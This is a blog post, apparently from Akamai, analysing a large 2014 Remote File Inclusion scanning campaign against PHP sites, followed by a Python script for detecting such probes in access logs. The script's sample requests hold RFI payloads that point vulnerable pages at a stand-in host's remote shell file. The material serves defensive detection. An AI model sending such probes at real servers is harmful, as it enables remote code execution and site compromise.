A Two Week Overview of the Latest Massive Scale RFI Scanning

In the past several weeks, Akamai was in a unique position to witness a massively orchestrated attack, designed to map Internet-facing web servers that are susceptible to certain specific vulnerabilities.

While various sources on the blogosphere speculated about the scale and nature of these attacks seen on their own infrastructure, Akamai's big data intelligence platform demonstrated the true massive scale and reach of this internet-wide orchestrated attack.

In order to thoroughly analyze this attack and bring you our conclusions and impressions, we extracted attack data for the last 2 weeks (January 5th - January 19th, 2014) from Akamai's security big data platform (Cloud Security Intelligence).

Detailed Findings:

During our analysis period, Akamai saw a total of 2,071,089 Remote File Inclusion attack attempts, targeting mostly PHP applications.

Our data shows that at its peak during the past 2 weeks, 80,000 attacks were launched per hour. It is also quite clear that attack volume has subsided gradually, and perhaps the attack is about to end.

In addition to the above, we saw that the most "active" attacker performed attacks against 86 different web sites, and sent a total of 73,515 attacks. The average number of attacked sites per attacker was 10 sites/attacker, while the average number of attacks per attacker stood at 8738 attacks/attacker.

When we inspected the top attack source IPs closely, we discovered that most of them were themselves running a web server, and appeared to belong to web hosting providers running the cPanel management application. Using compromised web servers to launch massive scale attacks on the web is definitely becoming the de facto approach for hackers who are looking for high bandwidth.

Depending on the attacker and target application, the scan itself probed for 2,000 - 2,500 different known Remote File Inclusion vulnerabilities, mostly in PHP applications. Our data also shows that when the web server failed to respond according to the scanner's expected behavior (e.g. HTTP authentication was required, or an HTTP 5XX error was raised), scanning activity stopped after only a few attempts.

While we can't expose the names and industry sectors of the target sites, it's clear from the top-level domains of the sites that attackers were not only interested in .com web sites, but also targeted government and military web properties.

Of the 2,071,089 attacks registered during our sample period, more than 99% of HTTP requests were extremely basic and were stripped of almost all HTTP headers except the mandatory 'Host' header. This leads us to believe that a very rudimentary script performed the attacks: sophisticated scanners usually crawl more deeply, support cookie-setting and session token refresh, and submit more headers in order to mimic browser web interaction.
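The two observations above (RFI probes carrying a remote URL in a query parameter, and requests stripped down to the bare Host header) together with the per-attacker statistics earlier in the article translate directly into detection logic a defender can run over their own access logs. The following is an added example, not Akamai's code or data: it parses raw HTTP requests, flags query parameters whose value is a remote URL (the classic RFI payload aimed at PHP's include()/require()), notes which requests carry nothing but Host, and aggregates attempts and distinct target sites per source address. All request text and source addresses are constructed for illustration.

```python
"""Flag Remote File Inclusion probes in raw HTTP requests and summarise them
per source address. Added example with constructed sample data; not Akamai's
code or data."""
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Schemes an RFI payload uses to make PHP's include()/require() fetch a remote file.
REMOTE_SCHEMES = ("http", "https", "ftp")


def parse_request(raw: str):
    """Split a raw HTTP/1.x request into (method, target, headers).
    Header names are lower-cased so lookups are case-insensitive."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if not line:
            continue
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers


def rfi_params(target: str):
    """Return (name, value) pairs of query parameters whose value is a remote URL.
    parse_qsl decodes percent-encoding, so an encoded 'http%3A%2F%2F...' is caught too."""
    query = urlsplit(target).query
    hits = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        if urlsplit(value).scheme.lower() in REMOTE_SCHEMES:
            hits.append((name, value))
    return hits


def is_bare_request(headers) -> bool:
    """True when the request carries nothing but the mandatory Host header,
    the fingerprint of the rudimentary scanner described in the article."""
    return set(headers) == {"host"}


def summarise(entries):
    """entries: iterable of (source_ip, raw_request).
    Returns {source_ip: {"attacks": n, "sites": distinct hosts, "bare": n}}
    counting only requests that contain an RFI payload."""
    per_ip = defaultdict(lambda: {"attacks": 0, "sites": set(), "bare": 0})
    for src, raw in entries:
        _method, target, headers = parse_request(raw)
        if not rfi_params(target):
            continue
        rec = per_ip[src]
        rec["attacks"] += 1
        rec["sites"].add(headers.get("host", "?"))
        if is_bare_request(headers):
            rec["bare"] += 1
    return {ip: {"attacks": r["attacks"], "sites": len(r["sites"]), "bare": r["bare"]}
            for ip, r in per_ip.items()}


def averages(stats):
    """(average attacked sites per attacker, average attacks per attacker),
    the two ratios reported in the article, computed over the summary."""
    if not stats:
        return (0.0, 0.0)
    n = len(stats)
    return (sum(r["sites"] for r in stats.values()) / n,
            sum(r["attacks"] for r in stats.values()) / n)


# Constructed sample: one bare-header scanner hitting two sites, one browser-like
# client sending a single encoded probe and one benign request.
SAMPLE = [
    ("198.51.100.7", "GET /index.php?page=http://evil.example/shell.txt? HTTP/1.1\r\n"
                     "Host: site-a.example\r\n\r\n"),
    ("198.51.100.7", "GET /admin/config.php?path=http://evil.example/shell.txt? HTTP/1.1\r\n"
                     "Host: site-b.example\r\n\r\n"),
    ("198.51.100.7", "GET /modules/view.php?inc=ftp://evil.example/x.txt HTTP/1.1\r\n"
                     "Host: site-a.example\r\n\r\n"),
    ("203.0.113.9", "GET /index.php?page=https%3A%2F%2Fevil.example%2Fs.txt%3F HTTP/1.1\r\n"
                    "Host: site-c.example\r\nUser-Agent: Mozilla/5.0\r\nAccept: */*\r\n\r\n"),
    ("203.0.113.9", "GET /index.php?page=about HTTP/1.1\r\n"
                    "Host: site-c.example\r\nUser-Agent: Mozilla/5.0\r\n\r\n"),
]

if __name__ == "__main__":
    stats = summarise(SAMPLE)
    for ip, rec in stats.items():
        print(ip, rec)
    print("avg sites/attacker, avg attacks/attacker:", averages(stats))
```

On the sample, 198.51.100.7 is reported with 3 attacks against 2 sites, all 3 bare-header, and 203.0.113.9 with 1 attack against 1 site. A remote-URL parameter value is a strong signal but not proof on its own (some applications legitimately accept URLs), so the bare-header count is worth keeping as a second indicator before blocking. On the PHP side, the probes in this campaign only succeed where `allow_url_include` is enabled; it defaults to Off and should stay that way.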